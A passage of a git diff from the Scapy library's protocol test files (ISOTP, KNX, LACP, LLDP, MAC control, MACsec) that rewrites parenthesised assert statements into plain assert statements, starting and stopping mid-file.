TestSocket(CAN) as isocan_tx, ISOTPSoftSocket(isocan_tx, 0x123, 0x321) as s sniffer.join(timeout=1) rx = sniffer.results[0] -assert(rx == msg) -assert(rx2 is not None) -assert(rx2 == msg) +assert rx == msg +assert rx2 is not None +assert rx2 == msg = ISOTPSoftSocket sniff @@ -694,15 +694,15 @@ with TestSocket(CAN) as isocan1, ISOTPSoftSocket(isocan1, 0x123, 0x321) as sock, msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') msg.data += b'0' -assert(rx[0] == msg) +assert rx[0] == msg msg.data += b'1' -assert(rx[1] == msg) +assert rx[1] == msg msg.data += b'2' -assert(rx[2] == msg) +assert rx[2] == msg msg.data += b'3' -assert(rx[3] == msg) +assert rx[3] == msg msg.data += b'4' -assert(rx[4] == msg) +assert rx[4] == msg + ISOTPSoftSocket MITM attack tests @@ -825,7 +825,7 @@ with TestSocket(CAN) as cs1, ISOTPSoftSocket(cs1, tx_id=0x641, rx_id=0x241) as s result = s1.sniff(count=1, timeout=5) assert len(result) == 1 -assert(result[0].data == isotp.data) +assert result[0].data == isotp.data = Two ISOTPSoftSockets at the same time, sending and receiving with tx_gap @@ -838,7 +838,7 @@ with TestSocket(CAN) as cs1, ISOTPSoftSocket(cs1, tx_id=0x641, rx_id=0x241, stmi result = s1.sniff(count=1, timeout=5) assert len(result) == 1 -assert(result[0].data == isotp.data) +assert result[0].data == isotp.data = Two ISOTPSoftSockets at the same time, multiple sends/receives @@ -868,7 +868,7 @@ with TestSocket(CAN) as cs1, ISOTPSoftSocket(cs1, tx_id=0x641, rx_id=0x241, padd s.failure_analysis() raise Scapy_Exception("ERROR") res = pkts[0] - assert(res.length == 8) + assert res.length == 8 = Send a two-frame ISOTP message with padding @@ -891,12 +891,12 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241 acker.join(timeout=5) canpks.sort(key=lambda x:x.identifier) -assert(canpks[1].identifier == 0x641) -assert(canpks[1].data == dhex("10 08 01 02 03 04 05 06")) -assert(canpks[0].identifier == 0x241) -assert(canpks[0].data == dhex("30 00 00")) -assert(canpks[2].identifier == 0x641) -assert(canpks[2].data == dhex("21 07 08 CC CC CC CC CC")) +assert canpks[1].identifier == 0x641 +assert canpks[1].data == dhex("10 08 01 02 03 04 05 06") +assert canpks[0].identifier == 0x241 +assert canpks[0].data == dhex("30 00 00") +assert canpks[2].identifier == 0x641 +assert canpks[2].data == dhex("21 07 08 CC CC CC CC CC") = Receive a padded single frame ISOTP message with padding disabled @@ -909,7 +909,7 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241 s.failure_analysis() raise Scapy_Exception("ERROR") res = pkts[0] - assert(res.data == dhex("05 06")) + assert res.data == dhex("05 06") = Receive a padded single frame ISOTP message with padding enabled @@ -922,7 +922,7 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241 s.failure_analysis() raise Scapy_Exception("ERROR") res = pkts[0] - assert(res.data == dhex("05 06")) + assert res.data == dhex("05 06") = Receive a non-padded single frame ISOTP message with padding enabled @@ -935,7 +935,7 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241 s.failure_analysis() raise Scapy_Exception("ERROR") res = pkts[0] - assert(res.data == dhex("05 06")) + assert res.data == dhex("05 06") = Receive a padded two-frame ISOTP message with padding enabled @@ -949,7 +949,7 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241 s.failure_analysis() raise Scapy_Exception("ERROR") res = pkts[0] - assert(res.data == dhex("01 02 03 04 05 06 07 08 09")) + assert res.data == dhex("01 02 03 04 05 06 07 08 09") = Receive a padded two-frame ISOTP message with padding disabled with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241, padding=False) as s: @@ -963,7 +963,7 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241 raise Scapy_Exception("ERROR") res = pkts[0] res.show() - assert(res.data == dhex("01 02 03 04 05 06 07 08 09")) + assert res.data == dhex("01 02 03 04 05 06 07 08 09") + Cleanup diff --git a/test/contrib/knx.uts b/test/contrib/knx.uts index 39d00314c93..c7ab8abf7ee 100644 --- a/test/contrib/knx.uts +++ b/test/contrib/knx.uts @@ -7,67 +7,67 @@ from scapy.contrib.knx import * + Test KNX Header = Header default values pkt = KNX() -assert(raw(pkt) == b'\x06\x10\x00\x00\x00\x06') +assert raw(pkt) == b'\x06\x10\x00\x00\x00\x06' = KNX Header payload length calculation pkt = KNX(service_identifier=0x0203)/KNXDescriptionRequest() -assert(raw(pkt)[4:6] == b'\x00\x0e') +assert raw(pkt)[4:6] == b'\x00\x0e' = KNX Header Guess Payload KNXSearchRequest p = KNX(b'\x06\x10\x02\x01\x00\x0e\x08\x01\x00\x00\x00\x00\x00\x00') -assert(isinstance(p.payload, KNXSearchRequest)) +assert isinstance(p.payload, KNXSearchRequest) = KNX Header Guess Payload KNXSearchResponse p = KNX(b'\x06\x10\x02\x02\x00F\x08\x01\x00\x00\x00\x00\x00\x006\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x02') -assert(isinstance(p.payload, KNXSearchResponse)) +assert isinstance(p.payload, KNXSearchResponse) = KNX Header Guess Payload KNXDescriptionRequest p = KNX(b'\x06\x10\x02\x03\x00\x0e\x08\x01\x00\x00\x00\x00\x00\x00') -assert(isinstance(p.payload, KNXDescriptionRequest)) +assert isinstance(p.payload, KNXDescriptionRequest) = KNX Header Guess Payload KNXDescriptionResponse p = KNX(b'\x06\x10\x02\x04\x00>6\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x02') -assert(isinstance(p.payload, KNXDescriptionResponse)) +assert isinstance(p.payload, KNXDescriptionResponse) = KNX Header Guess Payload KNXConnectRequest p = KNX(b'\x06\x10\x02\x05\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x02\x03') -assert(isinstance(p.payload, KNXConnectRequest)) +assert isinstance(p.payload, KNXConnectRequest) = KNX Header Guess Payload KNXConnectResponse p = KNX(b'\x06\x10\x02\x06\x00\x12\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x02\x03') -assert(isinstance(p.payload, KNXConnectResponse)) +assert isinstance(p.payload, KNXConnectResponse) = KNX Header Guess Payload KNXConnectionstateRequest p = KNX(b'\x06\x10\x02\x07\x00\x10\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00') -assert(isinstance(p.payload, KNXConnectionstateRequest)) +assert isinstance(p.payload, KNXConnectionstateRequest) = KNX Header Guess Payload KNXConnectionstateResponse p = KNX(b'\x06\x10\x02\x08\x00\x08\x00\x00') -assert(isinstance(p.payload, KNXConnectionstateResponse)) +assert isinstance(p.payload, KNXConnectionstateResponse) = KNX Header Guess Payload KNXDisconnectRequest p = KNX(b'\x06\x10\x02\t\x00\x10\x01\x00\x08\x01\x00\x00\x00\x00\x00\x00') -assert(isinstance(p.payload, KNXDisconnectRequest)) +assert isinstance(p.payload, KNXDisconnectRequest) = KNX Header Guess Payload KNXDisconnectResponse p = KNX(b'\x06\x10\x02\n\x00\x08\x00\x00') -assert(isinstance(p.payload, KNXDisconnectResponse)) +assert isinstance(p.payload, KNXDisconnectResponse) = KNX Header Guess Payload KNXConfigurationRequest p = KNX(b'\x06\x10\x03\x10\x00\x15\x04\x01\x00\x00\x00\x00\xbc\xe0\x00\x00\n\x03\x01\x00\x80') -assert(isinstance(p.payload, KNXConfigurationRequest)) +assert isinstance(p.payload, KNXConfigurationRequest) = KNX Header Guess Payload KNXConfigurationACK p = KNX(b'\x06\x10\x03\x11\x00\n\x04\x01\x00\x00') -assert(isinstance(p.payload, KNXConfigurationACK)) +assert isinstance(p.payload, KNXConfigurationACK) = KNX Header Guess Payload KNXTunnelingRequest p = KNX(b'\x06\x10\x04 \x00\x15\x04\x01\x00\x00\x00\x00\xbc\xe0\x00\x00\n\x03\x01\x00\x80') -assert(isinstance(p.payload, KNXTunnelingRequest)) +assert isinstance(p.payload, KNXTunnelingRequest) = KNX Header Guess Payload KNXTunnelingACK p = KNX(b'\x06\x10\x04!\x00\n\x04\x01\x00\x00') -assert(isinstance(p.payload, KNXTunnelingACK)) +assert isinstance(p.payload, KNXTunnelingACK) + Test layer binding = Destination port diff --git a/test/contrib/lacp.uts b/test/contrib/lacp.uts index 435c7dda30c..3c778e890d1 100644 --- a/test/contrib/lacp.uts +++ b/test/contrib/lacp.uts @@ -32,11 +32,11 @@ raw_pkt = b'\x01\x80\xc2\x00\x00\x02\x00\x13\xc4\x12\x0f\x0d\x88\x09\x01\x01\x01 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \ b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \ b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -assert(s == raw_pkt) +assert s == raw_pkt p = Ether(s) -assert(SlowProtocol in p and LACP in p) -assert(raw(p) == raw_pkt) +assert SlowProtocol in p and LACP in p +assert raw(p) == raw_pkt = Marker sanity @@ -44,5 +44,5 @@ pkt = Ether(src="00:13:c4:12:0f:0d") / SlowProtocol() / MarkerProtocol() pkt.show() s = raw(pkt) p = Ether(s) -assert(SlowProtocol in p and MarkerProtocol in p) -assert(raw(p) == s) +assert SlowProtocol in p and MarkerProtocol in p +assert raw(p) == s diff --git a/test/contrib/lldp.uts b/test/contrib/lldp.uts index be3636901ae..8bddeb32ebe 100644 --- a/test/contrib/lldp.uts +++ b/test/contrib/lldp.uts @@ -43,8 +43,8 @@ frm = Ether(src='01:01:01:01:01:01', dst=LLDP_NEAREST_BRIDGE_MAC) / \ LLDPDUChassisID(subtype=LLDPDUChassisID.SUBTYPE_MAC_ADDRESS, id='06:05:04:03:02:01') / \ LLDPDUTimeToLive() / \ LLDPDUEndOfLLDPDU() -assert(len(raw(frm)) == 60) -assert(len(raw(Ether(raw(frm))[Padding])) == 24) +assert len(raw(frm)) == 60 +assert len(raw(Ether(raw(frm))[Padding])) == 24 frm = Ether(src='01:01:01:01:01:01', dst=LLDP_NEAREST_BRIDGE_MAC) / \ LLDPDUPortID(subtype=LLDPDUPortID.SUBTYPE_INTERFACE_NAME, id='eth012345678901234567890123') / \ @@ -268,14 +268,14 @@ three_b_enum_field = ThreeBytesEnumField('test', 0x00, 0x112233: '1#2#3' }) -assert(three_b_enum_field.i2repr(None, 0) == 'zero') -assert(three_b_enum_field.i2repr(None, 0x0e) == 'fourteen') -assert(three_b_enum_field.i2repr(None, 0x5566) == 'five-six') -assert(three_b_enum_field.i2repr(None, 0x112233) == '1#2#3') -assert(three_b_enum_field.i2repr(None, 0x0e0000) == 'fourteen-zero-zero') -assert(three_b_enum_field.i2repr(None, 0x0e0100) == 'fourteen-one-zero') -assert(three_b_enum_field.i2repr(None, 0x01) == '1') -assert(three_b_enum_field.i2repr(None, 0x49763) == '300899') +assert three_b_enum_field.i2repr(None, 0) == 'zero' +assert three_b_enum_field.i2repr(None, 0x0e) == 'fourteen' +assert three_b_enum_field.i2repr(None, 0x5566) == 'five-six' +assert three_b_enum_field.i2repr(None, 0x112233) == '1#2#3' +assert three_b_enum_field.i2repr(None, 0x0e0000) == 'fourteen-zero-zero' +assert three_b_enum_field.i2repr(None, 0x0e0100) == 'fourteen-one-zero' +assert three_b_enum_field.i2repr(None, 0x01) == '1' +assert three_b_enum_field.i2repr(None, 0x49763) == '300899' = LLDPDUGenericOrganisationSpecific tests @@ -292,11 +292,11 @@ frm = Ether(src='01:01:01:01:01:01', dst=LLDP_NEAREST_BRIDGE_MAC)/\ frm = frm.build() frm = Ether(frm) org_spec_layer = frm[LLDPDUGenericOrganisationSpecific] -assert(org_spec_layer) -assert(org_spec_layer._type == 127) -assert(org_spec_layer.org_code == LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_PNO) -assert(org_spec_layer.subtype == 0x42) -assert(org_spec_layer._length == 34) +assert org_spec_layer +assert org_spec_layer._type == 127 +assert org_spec_layer.org_code == LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_PNO +assert org_spec_layer.subtype == 0x42 +assert org_spec_layer._length == 34 l="A" * 24 c=LLDPDUChassisID.SUBTYPE_CHASSIS_COMPONENT diff --git a/test/contrib/mac_control.uts b/test/contrib/mac_control.uts index 79a7d95a3a1..ee559a579d9 100644 --- a/test/contrib/mac_control.uts +++ b/test/contrib/mac_control.uts @@ -15,8 +15,8 @@ frm = Ether(src='00:01:01:01:01:01', dst=MACControl.DEFAULT_DST_MAC)/\ frm = Ether(frm.do_build()) pause_layer = frm[MACControlPause] -assert(pause_layer.pause_time == 0x1234) -assert(pause_layer.get_pause_time(ETHER_SPEED_MBIT_10) == 0.238592) +assert pause_layer.pause_time == 0x1234 +assert pause_layer.get_pause_time(ETHER_SPEED_MBIT_10) == 0.238592 = gate frame @@ -25,7 +25,7 @@ frm = Ether(src='00:01:01:01:01:01', dst=MACControl.DEFAULT_DST_MAC)/\ frm = Ether(frm.do_build()) gate_layer = frm[MACControlGate] -assert(gate_layer.timestamp == 0x12345678) +assert gate_layer.timestamp == 0x12345678 = report frame @@ -36,8 +36,8 @@ frm = Ether(frm.do_build()) report_layer = frm[MACControlReport] -assert(report_layer.timestamp == 0x12345678) -assert(report_layer.pending_grants == 0x23) +assert report_layer.timestamp == 0x12345678 +assert report_layer.pending_grants == 0x23 = report frame flags (generic for all other register frame types) @@ -46,7 +46,7 @@ for flag in MACControl.REGISTER_FLAGS: MACControlReport(timestamp=0x12345678, flags=flag) frm = Ether(frm.do_build()) report_layer = frm[MACControlReport] - assert(report_layer.flags == flag) + assert report_layer.flags == flag = register_req frame @@ -59,7 +59,7 @@ frm = Ether(src='00:01:01:01:01:01', dst=MACControl.DEFAULT_DST_MAC)/\ frm = Ether(frm.do_build()) register_req_layer = frm[MACControlRegisterReq] -assert(register_req_layer.timestamp == 0x87654321) +assert register_req_layer.timestamp == 0x87654321 assert (register_req_layer.echoed_pending_grants == 0x12) assert (register_req_layer.sync_time == 0x3344) assert (register_req_layer.assigned_port == 0x7766) @@ -73,9 +73,9 @@ frm = Ether(src='00:01:01:01:01:01', dst=MACControl.DEFAULT_DST_MAC)/\ frm = Ether(frm.do_build()) register_layer = frm[MACControlRegister] -assert(register_layer.timestamp == 0x11223344) -assert(register_layer.echoed_assigned_port == 0x2277) -assert(register_layer.echoed_sync_time == 0x3399) +assert register_layer.timestamp == 0x11223344 +assert register_layer.echoed_assigned_port == 0x2277 +assert register_layer.echoed_sync_time == 0x3399 = register_ack frame @@ -86,9 +86,9 @@ frm = Ether(src='00:01:01:01:01:01', dst=MACControl.DEFAULT_DST_MAC)/\ frm = Ether(frm.do_build()) register_ack_layer = frm[MACControlRegisterAck] -assert(register_ack_layer.timestamp == 0x11223344) -assert(register_ack_layer.echoed_assigned_port == 0x2277) -assert(register_ack_layer.echoed_sync_time == 0x3399) +assert register_ack_layer.timestamp == 0x11223344 +assert register_ack_layer.echoed_assigned_port == 0x2277 +assert register_ack_layer.echoed_sync_time == 0x3399 = class based flow control frame @@ -98,15 +98,15 @@ frm = Ether(src='00:01:01:01:01:01', dst=MACControl.DEFAULT_DST_MAC)/ \ frm = Ether(frm.do_build()) cbfc_layer = frm[MACControlClassBasedFlowControl] -assert(cbfc_layer.c0_enabled) -assert(cbfc_layer.c0_pause_time == 0x4321) -assert(cbfc_layer.c5_enabled) -assert(cbfc_layer.c5_pause_time == 0x1234) -assert(not cbfc_layer.c1_enabled) -assert(cbfc_layer.c1_pause_time == 0) -assert(not cbfc_layer.c7_enabled) -assert(cbfc_layer.c7_pause_time == 0) -assert(cbfc_layer._reserved == 0) +assert cbfc_layer.c0_enabled +assert cbfc_layer.c0_pause_time == 0x4321 +assert cbfc_layer.c5_enabled +assert cbfc_layer.c5_pause_time == 0x1234 +assert not cbfc_layer.c1_enabled +assert cbfc_layer.c1_pause_time == 0 +assert not cbfc_layer.c7_enabled +assert cbfc_layer.c7_pause_time == 0 +assert cbfc_layer._reserved == 0 + test padding @@ -116,7 +116,7 @@ frm = Ether(src='00:01:01:01:01:01', dst=MACControl.DEFAULT_DST_MAC) / \ MACControlRegisterAck(timestamp=0x12345678) frm = frm.do_build() -assert(len(frm) == 60) +assert len(frm) == 60 = single vlan tag @@ -125,7 +125,7 @@ frm = Ether(src='00:01:01:01:01:01', dst=MACControl.DEFAULT_DST_MAC) / \ MACControlRegisterAck(timestamp=0x12345678) frm = frm.do_build() -assert(len(frm) == 60) +assert len(frm) == 60 = QinQ @@ -135,7 +135,7 @@ frm = Ether(src='00:01:01:01:01:01', dst=MACControl.DEFAULT_DST_MAC) / \ MACControlRegisterAck(timestamp=0x12345678) frm = frm.do_build() -assert(len(frm) == 60) +assert len(frm) == 60 = hand craftet payload (disabled auto padding) @@ -145,5 +145,5 @@ frm = Ether(src='00:01:01:01:01:01', dst=MACControl.DEFAULT_DST_MAC) / \ frm = Ether(frm.do_build()) raw_layer = frm[Raw] -assert(raw_layer.load == b'may pass devices') -assert(len(frm) < 64) +assert raw_layer.load == b'may pass devices' +assert len(frm) < 64 diff --git a/test/contrib/macsec.uts b/test/contrib/macsec.uts index 046833d3e84..26caaaf2cc4 100755 --- a/test/contrib/macsec.uts +++ b/test/contrib/macsec.uts @@ -11,32 +11,32 @@ sa = MACsecSA(sci=b'\x52\x54\x00\x13\x01\x56\x00\x01', an=0, pn=100, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=1, send_sci=1) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/IP(src='192.168.0.1', dst='192.168.0.2')/ICMP(type='echo-request')/"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890" m = sa.encap(p) -assert(m.type == ETH_P_MACSEC) -assert(m[MACsec].type == ETH_P_IP) -assert(len(m) == len(p) + 16) -assert(m[MACsec].an == 0) -assert(m[MACsec].pn == 100) -assert(m[MACsec].shortlen == 0) -assert(m[MACsec].SC) -assert(m[MACsec].E) -assert(m[MACsec].C) -assert(m[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01') +assert m.type == ETH_P_MACSEC +assert m[MACsec].type == ETH_P_IP +assert len(m) == len(p) + 16 +assert m[MACsec].an == 0 +assert m[MACsec].pn == 100 +assert m[MACsec].shortlen == 0 +assert m[MACsec].SC +assert m[MACsec].E +assert m[MACsec].C +assert m[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01' = MACsec - basic encryption - encrypted sa = MACsecSA(sci=b'\x52\x54\x00\x13\x01\x56\x00\x01', an=0, pn=100, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=1, send_sci=1) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/IP(src='192.168.0.1', dst='192.168.0.2')/ICMP(type='echo-request')/"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890" m = sa.encap(p) e = sa.encrypt(m) -assert(e.type == ETH_P_MACSEC) -assert(e[MACsec].type == None) -assert(len(e) == len(p) + 16 + 16) -assert(e[MACsec].an == 0) -assert(e[MACsec].pn == 100) -assert(e[MACsec].shortlen == 0) -assert(e[MACsec].SC) -assert(e[MACsec].E) -assert(e[MACsec].C) -assert(e[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01') +assert e.type == ETH_P_MACSEC +assert e[MACsec].type == None +assert len(e) == len(p) + 16 + 16 +assert e[MACsec].an == 0 +assert e[MACsec].pn == 100 +assert e[MACsec].shortlen == 0 +assert e[MACsec].SC +assert e[MACsec].E +assert e[MACsec].C +assert e[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01' = MACsec - basic decryption - encrypted sa = MACsecSA(sci=b'\x52\x54\x00\x13\x01\x56\x00\x01', an=0, pn=100, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=1, send_sci=1) @@ -44,17 +44,17 @@ p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/IP(src='192.168.0.1' m = sa.encap(p) e = sa.encrypt(m) d = sa.decrypt(e) -assert(d.type == ETH_P_MACSEC) -assert(d[MACsec].type == ETH_P_IP) -assert(len(d) == len(m)) -assert(d[MACsec].an == 0) -assert(d[MACsec].pn == 100) -assert(d[MACsec].shortlen == 0) -assert(d[MACsec].SC) -assert(d[MACsec].E) -assert(d[MACsec].C) -assert(d[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01') -assert(raw(d) == raw(m)) +assert d.type == ETH_P_MACSEC +assert d[MACsec].type == ETH_P_IP +assert len(d) == len(m) +assert d[MACsec].an == 0 +assert d[MACsec].pn == 100 +assert d[MACsec].shortlen == 0 +assert d[MACsec].SC +assert d[MACsec].E +assert d[MACsec].C +assert d[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01' +assert raw(d) == raw(m) = MACsec - basic decap - decrypted sa = MACsecSA(sci=b'\x52\x54\x00\x13\x01\x56\x00\x01', an=0, pn=100, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=1, send_sci=1) @@ -63,7 +63,7 @@ m = sa.encap(p) e = sa.encrypt(m) d = sa.decrypt(e) r = sa.decap(d) -assert(raw(r) == raw(p)) +assert raw(r) == raw(p) @@ -71,33 +71,33 @@ assert(raw(r) == raw(p)) sa = MACsecSA(sci=b'\x52\x54\x00\x13\x01\x56\x00\x01', an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=1) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/IP(src='192.168.0.1', dst='192.168.0.2')/ICMP(type='echo-request')/"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890" m = sa.encap(p) -assert(m.type == ETH_P_MACSEC) -assert(m[MACsec].type == ETH_P_IP) -assert(len(m) == len(p) + 16) -assert(m[MACsec].an == 0) -assert(m[MACsec].pn == 200) -assert(m[MACsec].shortlen == 0) -assert(m[MACsec].SC) -assert(not m[MACsec].E) -assert(not m[MACsec].C) -assert(m[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01') +assert m.type == ETH_P_MACSEC +assert m[MACsec].type == ETH_P_IP +assert len(m) == len(p) + 16 +assert m[MACsec].an == 0 +assert m[MACsec].pn == 200 +assert m[MACsec].shortlen == 0 +assert m[MACsec].SC +assert not m[MACsec].E +assert not m[MACsec].C +assert m[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01' = MACsec - basic encryption - integrity only sa = MACsecSA(sci=b'\x52\x54\x00\x13\x01\x56\x00\x01', an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=1) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/IP(src='192.168.0.1', dst='192.168.0.2')/ICMP(type='echo-request')/"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890" m = sa.encap(p) e = sa.encrypt(m) -assert(m.type == ETH_P_MACSEC) -assert(e[MACsec].type == None) -assert(len(e) == len(p) + 16 + 16) -assert(e[MACsec].an == 0) -assert(e[MACsec].pn == 200) -assert(e[MACsec].shortlen == 0) -assert(e[MACsec].SC) -assert(not e[MACsec].E) -assert(not e[MACsec].C) -assert(e[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01') -assert(raw(e)[:-16] == raw(m)) +assert m.type == ETH_P_MACSEC +assert e[MACsec].type == None +assert len(e) == len(p) + 16 + 16 +assert e[MACsec].an == 0 +assert e[MACsec].pn == 200 +assert e[MACsec].shortlen == 0 +assert e[MACsec].SC +assert not e[MACsec].E +assert not e[MACsec].C +assert e[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01' +assert raw(e)[:-16] == raw(m) = MACsec - basic decryption - integrity only sa = MACsecSA(sci=b'\x52\x54\x00\x13\x01\x56\x00\x01', an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=1) @@ -105,17 +105,17 @@ p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/IP(src='192.168.0.1' m = sa.encap(p) e = sa.encrypt(m) d = sa.decrypt(e) -assert(d.type == ETH_P_MACSEC) -assert(d[MACsec].type == ETH_P_IP) -assert(len(d) == len(m)) -assert(d[MACsec].an == 0) -assert(d[MACsec].pn == 200) -assert(d[MACsec].shortlen == 0) -assert(d[MACsec].SC) -assert(not d[MACsec].E) -assert(not d[MACsec].C) -assert(d[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01') -assert(raw(d) == raw(m)) +assert d.type == ETH_P_MACSEC +assert d[MACsec].type == ETH_P_IP +assert len(d) == len(m) +assert d[MACsec].an == 0 +assert d[MACsec].pn == 200 +assert d[MACsec].shortlen == 0 +assert d[MACsec].SC +assert not d[MACsec].E +assert not d[MACsec].C +assert d[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01' +assert raw(d) == raw(m) = MACsec - basic decap - integrity only sa = MACsecSA(sci=b'\x52\x54\x00\x13\x01\x56\x00\x01', an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=1) @@ -124,77 +124,77 @@ m = sa.encap(p) e = sa.encrypt(m) d = sa.decrypt(e) r = sa.decap(d) -assert(raw(r) == raw(p)) +assert raw(r) == raw(p) = MACsec - encap - shortlen 2 sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=1) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd') m = sa.encap(p) -assert(m[MACsec].shortlen == 2) -assert(len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0)) +assert m[MACsec].shortlen == 2 +assert len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0) = MACsec - encap - shortlen 10 sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=1) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/Raw("x" * 8) m = sa.encap(p) -assert(m[MACsec].shortlen == 10) -assert(len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0)) +assert m[MACsec].shortlen == 10 +assert len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0) = MACsec - encap - shortlen 18 sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=1) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/Raw("x" * 16) m = sa.encap(p) -assert(m[MACsec].shortlen == 18) -assert(len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0)) +assert m[MACsec].shortlen == 18 +assert len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0) = MACsec - encap - shortlen 32 sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=1) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/Raw("x" * 30) m = sa.encap(p) -assert(m[MACsec].shortlen == 32) -assert(len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0)) +assert m[MACsec].shortlen == 32 +assert len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0) = MACsec - encap - shortlen 40 sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=1) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/Raw("x" * 38) m = sa.encap(p) -assert(m[MACsec].shortlen == 40) -assert(len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0)) +assert m[MACsec].shortlen == 40 +assert len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0) = MACsec - encap - shortlen 47 sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=1) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/Raw("x" * 45) m = sa.encap(p) -assert(m[MACsec].shortlen == 47) -assert(len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0)) +assert m[MACsec].shortlen == 47 +assert len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0) = MACsec - encap - shortlen 0 (48) sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=1) p = 